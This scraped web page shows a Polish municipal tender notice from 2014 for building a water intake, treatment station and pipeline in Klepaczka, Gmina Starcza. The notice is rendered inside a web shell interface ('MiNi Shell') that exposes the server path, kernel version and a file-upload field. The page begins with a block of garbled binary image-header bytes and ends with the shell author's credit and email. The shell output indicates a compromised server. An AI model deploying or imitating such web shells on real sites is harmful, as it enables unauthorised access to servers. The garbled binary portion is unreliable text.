JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140213/51828-N-2014.html

<p class="kh_header"><b>Starcza: Rozbudowa wodociągu gminnego - budowa ujęcia i stacji uzdatniania wody    w miejscowości Klepaczka</b><br>
<b>Numer ogłoszenia: 51828 - 2014; data zamieszczenia: 13.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starcza , ul. Gminna 4, 42-261 Starcza, woj. śląskie, tel. 034 3140334, faks 034 3140334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.starcza.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa wodociągu gminnego - budowa ujęcia i stacji uzdatniania wody    w miejscowości Klepaczka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  rozbudowa wodociągu gminnego - budowa ujęcia  i stacji uzdatniania wody w miejscowości Klepaczka.
Zakres w/w przedsięwzięcia obejmuje budowę ujęcia i  stacji uzdatniania wody  wraz z infrastrukturą towarzyszącą oraz  rozbudowę wodociągu gminnego.
Zadanie obejmuje część technologiczną w tym:
- budowę studni głębinowej wraz z obudową oraz instalacją pompy głębinowej, rurociągu tłocznego           
  i armatury
- budowę budynku stacji uzdatniania wody wraz z zagospodarowaniem terenu
- instalację aeracji inżektorowo - kaskadowej
- instalację filtracji ciśnieniowej 
- instalację odprowadzania wód popłucznych do odstojnika
- instalację sprężonego powietrza do celów napowietrzania wody, płukania filtrów oraz do napędów 
  pneumatycznych armatury,
- instalację awaryjnego dozowania podchlorynu sodu
- zbiorniki magazynowe wody uzdatnionej V =100m3
- automatyczny zestaw pompowy II stopnia
- wylot wód nadosadowych i przelewowych do odbiornika
- rozbudowę sieci wodociągowej Łysiec - Klepaczka
- rurociągi i kanały zewnętrzne
- instalację elektryczną

oraz część sanitarną w tym:
 -  instalację czystej wody
 -  instalację kanalizacji
 -  instalację wentylacji
 -  ogrzewanie
 -  osuszanie powietrza

Budowa ujęcia i stacji uzdatniania wody - założenia techniczne:
-	Urządzenia do poboru wody
            Ujęcie wody stanowić będzie studnia  głębinowa o głębokości 400m. W studni  
            zaprojektowano do instalacji pompę głębinową o następujących parametrach:
              - wydajność Q = 30,0m3/h
              - wysokość podnoszenia Hp = 60m sł. H2O
              - moc N = 7,5kW
-	Budynek stacji uzdatniania wody
Budynek SUW został zaprojektowany w konstrukcji tradycyjnej, parterowy, niepodpiwniczony, wolnostojący. Przykryty  dachem dwuspadowym o konstrukcji drewnianej i nachyleniu        dachu 15o.
Powierzchnia zabudowy    - 76,64m2
Powierzchnia użytkowa     - 61,89m2
Kubatura                            - 332,87m3
Długość budynku               - 12,46m
Szerokość budynku            - 6,43 m
-	Urządzenia do uzdatniania wody
- blok areacyjny inżektorowo - kaskadowy z poduszką  powietrzną o średnicy Dn 1000                          i wysokości H = 2600 mm - kpl .1
- zestawy filtracyjne wraz z osprzętem o średnicy Dn 1400mm, wysokości H = 2850mm, powierzchni filtracji  Pf = 1,54m2 z niskooporowym drenażem filtracyjnym ze stalową  nakładką 0,20mm oraz układem pośredniego płukania sprężonym powietrzem wierzchniej warstwy złoża filtracyjnego - kpl. 2.
      - sprężarka ze zbiornikiem V=90l, o parametrach Q = 0,24m3/min, p=10 bar, N=2,2 kW -  
        kpl. 2,
      - zestaw  dozujący podchloryn sodu, składający się z pompy dozującej oraz zbiornika 60l -  
         kpl. 1
-	Urządzenia do magazynowania wody
- stalowy zbiornik magazynowy wody o pojemności 100m3 - szt. 2
-	Urządzenia do podawania wody do sieci wodociągowej
- automatyczny zestaw pompowy składający się z 4 pomp wirowych pionowych - kpl. 1
 -Sieć wodociągowa
      Rurociąg zaprojektowano z rur PEHD; SDR17 o średnicy O 140 8,3 na ciśnienie 1,0 MPa,  
      łączonych metodą zgrzewania doczołowego. Wodociąg włączony będzie do istniejących 
      sieci wodociągowych w miejscowości Łysiec i Klepaczka. 
Zestawienie długości poszczególnych odcinków wodociągu:
 - wodociąg gminny (budynek SUW - węzeł  w3 ) Dz 140 8,3 mm PEHD SDR17 PN10,
   Lc = 197,20mb
- wodociąg gminny (węzeł  w1  - węzeł  w2) dz 140 8,3 mm PEHD SDR17 PN10,                     
   Lc  = 799,50mb..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.12.00-2, 45.33.20.00-3, 45.00.00.00-7, 45.33.23.00-6, 45.30.00.00-0, 45.23.13.00-8, 45.23.11.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują wykonanie                           tj. zakończenie  w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej jednej roboty budowlanej w zakresie budowy, przebudowy lub remontu ujęcia wody lub stacji uzdatniania wody o wartości nie mniejszej niż 2 mln złotych brutto.
W przypadku  robót, których wartość została wyrażona w umowie w innej walucie  niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia  robót (w przypadku robót rozliczanych wyłącznie w walutach  innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobą(ami), która(e) będzie(będą) pełnić funkcję kierownika budowy, posiadającą(ymi) uprawnienia do kierowania robotami budowlanymi w zakresie instalacji sanitarnych, instalacji elektrycznych, branży budowlano - konstrukcyjnej oraz do kierowania pracami geologicznymi.


Uwaga:
   Kierownik budowy powinien  posiadać uprawnienia budowlane bez ograniczeń zgodnie                      z ustawą  z  dnia  07 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010r. Nr 243 poz. 1623 z późn. zm.) oraz  rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jednolity Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
  Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone  w art. 12 ust. 1 ustawy mogą  również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity Dz. U. Nr 63, poz. 394 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują:
     a) posiadanie środków finansowych lub zdolności kredytowej o  łącznej kwocie w wysokości co najmniej 1 mln  zł
     b) posiadanie ubezpieczenia od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 mln zł.
Dokonanie oceny spełniania warunków udziału w postępowaniu będzie się odbywać metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów, określone w punktach 6.1 do 6.4 SIWZ

1.1.	W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie  z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników.

  1.2.  Dokumenty, o których mowa w  punktach  6.1c), 6.1d), 6.2a), 6.2b), 6.3a) SIWZ  
          winny być złożone w oryginale. Dokumenty, o których mowa w 6.1a, 6.1b), 6.3b),                
           6.4a), 6.4b) SIWZ winny być złożone w oryginale lub kopii poświadczonej za  
           zgodność  z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń                
           woli w imieniu Wykonawcy.
           Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na  
           język polski.
 
   1.3 W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) 
          lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi 
          złożyć dokumenty wymienione w punkcie 6.1 SIWZ (lub w punkcie 6.5.2 SIWZ -  jeżeli 
           Wykonawca ma siedzibę lub miejsce zamieszkania  poza terytorium Rzeczypospolitej 
           Polskiej wraz dokumentami wymienionymi w punkcie 6.1c i  6.1d specyfikacji).
           Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić  
           pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo do  
           reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne  
           pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli 
           każdego  ze wspólników.
           Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte 
            wykonanie zamówienia określoną w art. 366 Kodeksu cywilnego.

   1.4  Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na 
           wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych   
            podmiotów, niezależnie od charakteru prawnego łączących  go z nimi stosunków.   
            Wykonawca w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż 
            będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić  
            pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
            zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ww.  
            zobowiązanie musi być przedstawione w oryginale.

   1.5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz   
           w przypadku, gdy Wykonawca wskazuje  spełnianie warunków, o których mowa w 
            punktach 5.2, 5.3 oraz 5.4  SIWZ polega na zasobach innych podmiotów, 
            kopie dokumentów  potwierdzających spełnianie  tych warunków, dotyczących 
            odpowiednio wspólników konsorcjum lub innych podmiotów powinny być  
            poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy      
            w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, 
             jeżeli będzie  miał do tej czynności upoważnienie, a w odniesieniu do innych 
             podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w 
             odniesieniu do dotyczących go dokumentów).

  1.6.  Zgodnie z  art. 26 ust. 2c Jeżeli z uzasadnionej przyczyny Wykonawca nie może  
           przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej  
           wymaganych przez Zamawiającego, może przedstawić inny dokument, który w  
           wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego 
           warunku.
            Zgodnie z Rozporządzeniem  o dokumentach , jeżeli Wykonawca 
            wykazując spełnienie warunku, o którym mowa w punkcie 5.4 SIWZ polega na 
            zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 
            2b ustawy Pzp, wymaga się przedłożenia ww. informacji dotyczącej tych podmiotów.

2. Inne dokumenty wymagane przez Zamawiającego
a) Wypełniony  Formularz Oferta , stanowiący załącznik nr 2 do SIWZ.

Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli  upoważnienie takie nie wynika wprost                        z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:

1.	Zmiana umowy możliwa będzie w szczególności, gdy wystąpią:
1)	przypadki przewidziane prawem budowlanym
2)	obiektywne zdarzenia uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy
3)	uzasadniona konieczność wykonania robót dodatkowych, zamiennych lub konieczność rezygnacji z części robót w przypadku zaistnienia  okoliczności, której strony nie przewidziały przy zawarciu umowy
4)	zmiana podatku VAT
5)	zmiana podwykonawcy, kierownika  budowy lub osób nadzorujących realizację umowy po stronie Zamawiającego
6)	oczywiste omyłki pisarskie i rachunkowe w treści umowy
2.	Każdy z przypadków wymienionych w ppkt 1,2 i 3 udokumentowany zostanie stosownym protokołem, podpisanym przez Strony
3.	W przypadku zaistnienia okoliczności, o których mowa powyżej termin wykonania przedmiotu umowy może ulec zmianie proporcjonalnie do zaistniałej sytuacji w  razie rezygnacji  z wykonania części robót, wynagrodzenie Wykonawcy zostanie odpowiednio zmniejszone o wielkość wyceny tych robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starcza.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia wraz z drukiem oferty można uzyskać w siedzibie Zamawiającego tj. Urzędzie Gminy w Starczy,                       ul. Gminna 4, pok. nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2014 godzina 10:00, miejsce: Miejsce składania ofert: Urząd Gminy w Starczy, ul. Gminna 4, 42-261 Starcza pokój nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia pn.: Rozbudowa wodociągu gminnego - budowa ujęcia i stacji uzdatniania wody w miejscowości Klepaczka współfinansowany jest ze środków Unii Europejskiej w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego  Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com